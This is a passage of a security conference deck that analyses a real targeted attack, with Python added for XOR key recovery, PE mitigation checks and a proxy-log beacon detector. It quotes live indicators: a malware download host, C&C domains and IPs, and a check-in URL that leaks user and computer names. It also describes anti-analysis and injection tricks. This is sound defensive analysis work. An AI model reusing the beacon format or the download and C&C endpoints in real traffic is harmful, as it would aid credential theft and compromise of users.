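# order; the presentation does not state the actual byte order.
SLIDE_KEY = bytes.fromhex("4114D345")
DOS_STUB = b"This program cannot be run in DOS mode."

IMAGE_FILE_DLL = 0x2000
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_xor_key(data: bytes, keylen: int = 4,
                    known: bytes = DOS_STUB) -> Optional[Tuple[bytes, int]]:
    """Known-plaintext recovery of a repeating XOR key.

    A 4-byte key has 2^32 values, too many to try exhaustively the way single-byte
    XOR tools do, but a PE image carries predictable text. For every offset we
    assume `known` starts there, derive the key that would make it so, and keep
    the first candidate whose decryption looks like a PE (MZ header, PE
    signature, and the stub text actually present)."""
    probe = known[:keylen]
    for off in range(len(data) - keylen + 1):
        seen = [c ^ p for c, p in zip(data[off:off + keylen], probe)]
        # seen[j] is the key byte used at position off+j; rotate it back to position 0
        key = bytes(seen[(m - off) % keylen] for m in range(keylen))
        plain = xor_bytes(data, key)
        if plain[:2] == b"MZ" and b"PE\x00\x00" in plain and known in plain:
            return key, off
    return None


def pe_mitigations(pe: bytes) -> dict:
    """Parse the COFF and optional headers and report the DEP/ASLR opt-in bits."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, _nsec, _ts, _sym, _nsym, _optsize, chars = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    dllchars = struct.unpack_from("<H", pe, opt + 70)[0]   # same offset in PE32 and PE32+
    return {
        "machine": machine,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "pe32plus": magic == 0x20B,
        "aslr": bool(dllchars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dllchars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def build_sample_dll(dll_characteristics: int) -> bytes:
    """Constructed stand-in for an embedded DLL: DOS header and stub, PE signature,
    COFF header and a PE32 optional header carrying the given DllCharacteristics."""
    img = bytearray(b"MZ" + b"\x00" * 0x3A) + struct.pack("<I", 0x80)      # e_lfanew -> 0x80
    img += b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"     # DOS stub code
    img += DOS_STUB + b"\r\r\n$\x00"
    img += b"\x00" * (0x80 - len(img))
    img += b"PE\x00\x00"
    # Machine i386, no sections, PE32 optional header size, EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    img += struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                   # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    img += opt + bytes(range(256)) * 2                                      # filler standing in for section data
    return bytes(img)


def analyse_embedded_payload(blob: bytes) -> dict:
    """Recover the key from a carved XORed region, decrypt it and inspect the PE."""
    found = recover_xor_key(blob)
    if found is None:
        return {"key": None}
    key, off = found
    report = pe_mitigations(xor_bytes(blob, key))
    report.update(key=key.hex(), stub_offset=off)
    return report


if __name__ == "__main__":
    carved = xor_bytes(build_sample_dll(0x0000), SLIDE_KEY)   # what an analyst would carve from the PDF
    print(analyse_embedded_payload(carved))
```

The recovery stops at the first offset where the decrypted image starts with MZ, contains the PE signature and really contains the stub text, so a wrong alignment cannot be accepted by chance; on a real sample the carved region is the byte range following the object that holds the encrypted payload. A module that reports `aslr: False` is loaded at its preferred base on every run, which is the property the slides describe for icucnv36.dll / icucnv34.dll.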

Page 66: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- As a consequence, both DEP & ASLR were bypassed!

- Finally, the exploit also worked on Vista and 7, as it didn't use hardcoded XP syscalls.

- So basically it was already the end of the game…

Page 67: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The malware also used some tricks to prevent its analysis. For example, each time we used a Memory BP, we arrived in a long loop which always ended with an exception.

- After having dropped another binary from itself, the “mea.dll” overwrites part of its own Text section to prevent a memory dump.

- The malware also skipped part of its code while running within Immunity Debugger. For example, the “adobe1.exe” file was not dropped, even if the hidedebug plugin was used.

Page 68: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Another trick was to parse process names. When Process Monitor was running, we didn't see anything… We had far more results by just renaming the tool: we then showed the creation of a new binary.

- File access monitoring confirmed the creation of the new “adobe1.exe” binary.

Page 69: Cybercrime in nowadays businesses - A real case study of targeted attack

- This new binary was an unencrypted dropper.

Page 70: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- This was also confirmed through a behaviour analysis.

- Here we simply used a rogue DNS service to redirect traffic to an analysis server.

Page 71: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- This process downloaded the “update2.exe” binary from www.bringithomedude.com.

Page 72: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- And here we are! The final aim of the hackers was to silently get and execute a banking Trojan derived from SpyEyes code.

- So let's summarize what happened here.

Page 73: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

(Pages 73 to 79: summary slides of the malware analysis section; no text survived extraction.)

Page 80: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The file adobe1.exe is a simple loader of 2’560 bytes. It was not encrypted.

- On the other hand, the final update2.exe malware was a C# based binary of 668 Kb which included several protections aimed at preventing its reverse engineering. Disassembly revealed BASE64 encoding for raw data as well as encryption algorithms based on MD5 (System.Security.Cryptography.MD5CryptoServiceProvider), 3DES (System.Security.Cryptography.TripleDESCryptoServiceProvider) and AES (System.Security.Cryptography.RijndaelManaged).

Page 81: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- When this attack occurred, those files were undetected by most antivirus products.

- A few European antivirus products detected a potential threat, but all Eastern solutions such as Kaspersky, NOD32, DrWeb32 or VBA32 didn't detect anything.

- It is therefore possible that the Russian market was the initial target of our malware writers.

Page 82: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- On the 8th October 2010, 16 antivirus products out of 43 detected a potential threat in the final binary. The detection rate was about 37%.

- On the 15th October 2010, 19 antivirus products out of 43 were efficient. The detection rate was about 44%.

- Around 8 months later, on the 2nd June 2011, 34 antivirus products out of 43 detected a potential threat. This is a detection rate of 79%.

- Kaspersky, McAfee, Sophos and Microsoft were the most reactive.

Page 83: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Gdata, Panda and Sophos were the next ones.

- ClamAV, eSafe, F-Secure, Fortinet & PrevX have proven far less effective.

- The final payload behaves like Zbot. It was based on a mutation of SpyEyes. It is a Trojan aimed at the financial sector and it is able to disable the Windows Firewall and steal financial data, such as credit card numbers, eBanking information or trading credentials. Common Trojan features were also available, such as screen capture, additional malware download or remote administration capabilities.

Page 84: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- Upon execution, the Trojan creates a folder named svhostxxup.exe in the c:\ drive. Then it creates the files config.bin and svhostxxup.exe in that folder.

- The latter binary is then called. It is responsible for creating new memory pages in several system applications' address space, and therefore permits attackers to inject their malicious code into privileged programs.

Page 85: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The Trojan then modifies a few registry keys and becomes persistent.

Page 86: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The Reverse-Trojan also verifies the path from which it was run, and it checks whether the file “C:\Documents.exe”, “C:\Documents and Settings\user\Desktop.exe” or “C:\Documents and Settings\user\Desktop\update2.exe” exists in order to authorize or deny its own execution.

- It also checks for the registry key “HKEY_CLASSES_ROOT\AppID\update2.exe”.

- These are common practices among malware writers to help disturb Reverse Engineers.

Page 87: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The Trojan then gets the compromised computer name by querying LSA and lists the C:\ drive before doing a recursive search of living files within its parent directory.

- Getting computer and user names is also a common practice for Trojans, as they most often need to declare unique zombies on their C&C server to permit accurate communication with the Bot Herders.

Page 88: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The Trojan tried to send HTTP packets to 2 different servers:

- After having redirected those IP addresses with ARP Poisoning and simulating an HTTP service, we can see the Trojan saying a kind of “Hello, I'm here” to those web applications.

Page 89: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The first server was probably meant to offer an alternate route in case the second one was taken down. It actually forwarded its packets to greenchina.com.

Page 90: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- The domains involved have existed for quite a long time.

- The serv.com and greenchina.com domains were respectively registered in November 1994 and April 2001. The IP addresses which received the suspicious GET requests, 211.119.134.197 and 218.145.65.200, respectively hosted 1'644 and 11 websites.

- Despite its parameters, the URL http://www.greenchina.com/?guid=UserName!COMPUTERNAME!00CD1A40 did not look so dangerous...
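The GET request on this slide is a check-in: the guid parameter carries the user name, the computer name and a bot identifier, and the same request went to a second domain as a fallback route. As an added example (not part of the presentation or of High-Tech Bridge's tooling), the Python below turns that observation into a detection run over a constructed proxy log: it flags requests to the domains named on the slides, executable downloads, and any guid of the form user!host!hex, then groups the beaconing clients for triage. The log format and client addresses are constructed; the domains and the guid value are the ones quoted on the slides.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators quoted on the slides: the download host and the two C&C domains.
KNOWN_DOMAINS = {"www.bringithomedude.com", "greenchina.com", "serv.com"}

# The check-in format seen on the slide: guid=<user>!<computer name>!<8 hex digits>
BEACON_RE = re.compile(r"^(?P<user>[^!]+)!(?P<host>[^!]+)!(?P<id>[0-9A-Fa-f]{8})$")

# Constructed proxy log, one request per line: "<timestamp> <client ip> <method> <url> <status>".
# The first three lines replay the sequence from the slides; the last two are benign noise.
SAMPLE_LOG = """\
2010-10-08T09:12:01Z 10.0.0.23 GET http://www.bringithomedude.com/update2.exe 200
2010-10-08T09:12:07Z 10.0.0.23 GET http://www.greenchina.com/?guid=UserName!COMPUTERNAME!00CD1A40 200
2010-10-08T09:12:09Z 10.0.0.23 GET http://www.serv.com/?guid=UserName!COMPUTERNAME!00CD1A40 200
2010-10-08T09:13:44Z 10.0.0.31 GET http://www.example.com/index.html 200
2010-10-08T09:14:02Z 10.0.0.31 GET http://intranet.example.com/search?guid=report!2010 200
"""


def host_in(host: str, domains) -> bool:
    """Exact or subdomain match against an indicator list."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def analyse_request(line: str):
    """Return a finding for one log line, or None when nothing is suspicious."""
    ts, client, method, url, status = line.split()
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons = []
    finding = {"time": ts, "client": client, "host": host, "url": url}
    if host_in(host, KNOWN_DOMAINS):
        reasons.append("known C&C or download host")
    if parts.path.lower().endswith(".exe"):
        reasons.append("executable download")
    for guid in parse_qs(parts.query).get("guid", []):
        m = BEACON_RE.match(guid)
        if m:
            reasons.append("check-in beacon (guid=user!host!id)")
            # The bot reports the identity it collected; record it for the IR timeline.
            finding.update(reported_user=m["user"], reported_host=m["host"], bot_id=m["id"])
    if not reasons:
        return None
    finding["reasons"] = reasons
    return finding


def find_suspicious(log_text: str) -> list:
    """Run the per-line analysis over a whole log and keep the findings."""
    return [f for f in (analyse_request(l) for l in log_text.splitlines() if l.strip()) if f]


def infected_clients(findings) -> dict:
    """Group beacon findings per client so the IR team knows which hosts to triage."""
    out = {}
    for f in findings:
        if "bot_id" in f:
            out.setdefault(f["client"], set()).add(f["host"])
    return out


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["client"], h["host"], "; ".join(h["reasons"]))
    print("clients beaconing:", infected_clients(hits))
```

The guid pattern is deliberately strict (three fields, the last one exactly eight hex digits), so an ordinary application parameter such as guid=report!2010 is not flagged; the domain list alone would have missed the beacon if the operators had moved to a fresh domain, which is why the structural check is kept separate from the indicator match.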

Page 91: Cybercrime in nowadays businesses - A real case study of targeted attack

0x05 - Malware analysis

- It visually reached a standard webpage…

- But there was hidden information.

Page 92: Cybercrime in nowadays businesses - A real case study of targeted attack


Table of contents

0x00 - About me

0x01 - About this conference

0x02 - Project’s context

0x03 - Mail analysis

0x04 - Client’s Website analysis

0x05 - Malware analysis

0x06 - Conclusion

Page 93: Cybercrime in nowadays businesses - A real case study of targeted attack

0x06 - Conclusion

- Finally, the target of this complex attack was not directly our client, but his own customers.

- For sure, it has also impacted Fedor-Trading.

- Once the website was compromised, everything happened really fast.

- The attacks were initiated by an unfair competitor who afforded the services of the underground market.

- Both financial companies are present in Switzerland and abroad.

Page 94: Cybercrime in nowadays businesses - A real case study of targeted attack

0x06 - Conclusion

- So globally the attack implied:

  - Malware Code Writing (dropper, downloader, Banking Trojan)

  - 0-day Uncovering (Adobe Reader stack buffer overflow)

  - Social Engineering (Forex Regulation)

  - Web Attacks (Sh404Sef SQL Injection)

  - And most probably money transfer

- In fact, we are typically in a modern scenario of underground skills renting.

Page 95: Cybercrime in nowadays businesses - A real case study of targeted attack


0x06 - Conclusion

Page 96: Cybercrime in nowadays businesses - A real case study of targeted attack

0x06 - Conclusion

- This offers many business opportunities.

Page 97: Cybercrime in nowadays businesses - A real case study of targeted attack

0x06 - Conclusion

- Organised cybercrime exists in lots of countries, and a sophisticated underground economy has rapidly flourished over the last few years. But the huge majority of attacks involved China, Russia and Brazil.

Page 98: Cybercrime in nowadays businesses - A real case study of targeted attack

0x06 - Conclusion

- There is much less Hacking For Fun, and much more Hacking For Profit. Cybercrime has therefore become an enterprise with a thriving underground economy.

- New cybercriminals don't have to develop their own code… They can rent botnets and even purchase licensed malware that comes with its own tech support.

- Cybercrime is now developing and spreading faster than ever.

- So welcome to the World Wild Web… And happy Forensics! :)

Page 99: Cybercrime in nowadays businesses - A real case study of targeted attack


\xC29900: RETN 99

Your questions are always welcome!

[email protected]